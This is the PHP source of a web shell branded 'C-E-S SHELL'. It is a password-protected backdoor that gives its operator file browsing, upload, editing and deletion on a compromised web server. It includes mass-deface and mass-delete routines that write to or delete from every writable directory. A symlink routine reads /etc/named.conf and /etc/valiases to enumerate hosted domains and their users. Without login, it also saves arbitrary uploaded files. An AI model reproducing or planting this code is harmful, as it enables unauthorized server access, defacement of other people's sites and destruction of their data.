SHELL CES| SHELL

"; if(isset($_POST['minim_pass'])){ if($_POST['minim_pass'] == $auth){ $_SESSION['admin'] = "TRUE"; pindah('?home'); }else{ alert('AKU LANANG LO MAS'); pindah('?salak'); } } } function write($content,$dir){ $fh=fopen($dir,"w"); if(fwrite($fh,$content)){ return "1"; }else{ return "0"; } fclose($fh); } function author(){ print "

CYBER ERROR SYSTEM SHELL

"; } function delTree($dir){ $files = array_diff(scandir($dir), array('.', '..')); foreach ($files as $file) { (is_dir("$dir/$file")) ? delTree("$dir/$file") : unlink("$dir/$file"); } return rmdir($dir); } function alert($msg){ print ""; } function pindah($dir){ print ""; } if($_SESSION['admin'] == "TRUE"){ echo "C-E-S-SHELL "; $dir=$_GET['dir']; if(!$dir){ $dir=getcwd(); } echo "

{ C-E-S SHELL }

".php_uname()."
".serverip()." | ".$_SERVER['REMOTE_ADDR']."
"; $a=explode("/",$dir); foreach($a as $aa => $aaa){ if($aaa == '' && $aa == '0'){ echo "/"; continue; }elseif($aaa == ''){ continue; }else{ echo "$aaa/"; } } echo "

Home | +File | +Dir | Exit
"; $files = $_FILES['vulnfile']['name']; $dest = $dir.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['vulnfile']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo " Upload Successful"; } else { echo " Upload Failed"; } } else { if(@copy($_FILES['vulnfile']['tmp_name'], $dest)) { echo " Upload Successful"; } else { echo " Upload Failed"; } } } if(isset($_GET['nf'])){ echo " "; if($_POST['fok']){ pindah("?edit=$dir/".$_POST['fname']."&dir=$dir"); } }elseif(isset($_GET['nd'])){ echo " "; if($_POST['fok']){ if(mkdir("$dir/".$_POST['fname']."")){ echo "successfully created"; }else{ echo "Failed"; } } }elseif(isset($_GET['delf'])){ if(delTree($_GET['delf'])){ pindah("?dir=$dir"); }else{ alert('Failed.'); } }elseif(isset($_GET['renf'])){ $now=$_GET['renf']; echo " "; if(isset($_POST['fok'])){ $new=$_POST['fname']; if(rename($now,"$dir/$new")){ echo "Rename Successfully"; }else{ echo "Rename Failed"; } } }elseif(isset($_GET['del'])){ if(unlink($_GET['del'])){ //alert("Delete Successfully"); echo "Delete Successfully"; }else{ //alert("Failed"); echo "Delete Failed"; } }elseif(isset($_GET['exit'])){ session_destroy(); pindah('?home'); }elseif(isset($_GET['edit'])){ $save=$_GET['edit']; $cont=htmlspecialchars(file_get_contents($save)); echo "

"; author(); if(isset($_POST['pausiganteng'])){ if(write($_POST['fcont'],$save) == "1"){ echo "

Edit Successfully

"; alert('Edit Successfully.'); }else{ alert('Failed.'); echo('Failed.'); } } }elseif($_GET['mass'] == 'deface'){ //mass deface function mass_kabeh($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = mass_kabeh($dirc,$namafile,$isi_script); } } } } } } function mass_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $dirb/$namafile
"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe'] == 'massal') { echo "

"; mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "

"; } elseif($_POST['tipe'] == 'biasa') { echo "

"; mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "

"; } echo "<- kembali"; } else { echo ""; echo ""; } }elseif($_GET['mass'] == 'delete') { function hapus_massal($dir,$namafile) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { if(file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif($dirb === '..') { if(file_exists("".dirname($dir)."/$namafile")) { unlink("".dirname($dir)."/$namafile"); } } else { if(is_dir($dirc)) { if(is_writable($dirc)) { if(file_exists($lokasi)) { echo "[DELETED] $lokasi
"; unlink($lokasi); $idx = hapus_massal($dirc,$namafile); } } } } } } } if($_POST['start']) { echo "

"; hapus_massal($_POST['d_dir'], $_POST['d_file']); echo "

"; echo "<- kembali"; } else { echo ""; echo ""; } }elseif(isset($_GET['sym'])) { if (!is_file('named.txt')) { $d00m = @file("/etc/named.conf"); } else { $d00m = @file("named.txt"); } if (!$d00m) { die(""); } else { echo "

"; foreach ($d00m as $dom) { if (eregi("zone", $dom)) { preg_match_all('#zone "(.*)"#', $dom, $domsws); flush(); if (strlen(trim($domsws[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domsws[1][0])); flush(); $site = $user['name']; @symlink("/", "sym/root"); $site = $domsws[1][0]; $ir = 'ir'; $il = 'il'; if (preg_match("/.^$ir/", $domsws[1][0]) or preg_match("/.^$il/", $domsws[1][0])) { $site = "

" . $domsws[1][0] . "

"; } echo " "; flush(); flush(); } } } } }elseif(isset($_GET['src'])){ $cont=$_GET['src']; print "

".htmlspecialchars(file_get_contents($cont))."

"; }else{ /* Form file upload*/ echo "
"; echo "

Domains	Users	symlink
" . $site . "	" . $user['name'] . "	symlink

"; //scandir $s=scandir($dir); foreach($s as $fol){ if($fol == "."){ continue; }elseif($fol == ".."){ print ""; }else{ if(is_dir("$dir/$fol") == TRUE){ print ""; } } } foreach($s as $file){ if($file == "." || $file == ".."){ continue; }else{ $size=filesize("$dir/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; }if(is_file("$dir/$file") == TRUE){ print ""; } } } author(); } }else{ login(); $name=$_FILES['s']['name']; $tmp=$_FILES['s']['tmp_name']; if(copy($tmp,$name)){}else{ print "Developed by C-E-S - SHELL"; } } ?>

Name	Type / Size	Action
$fol
$fol	Folder	Delete \| Rename
$file	$size	Edit \| Delete \| Rename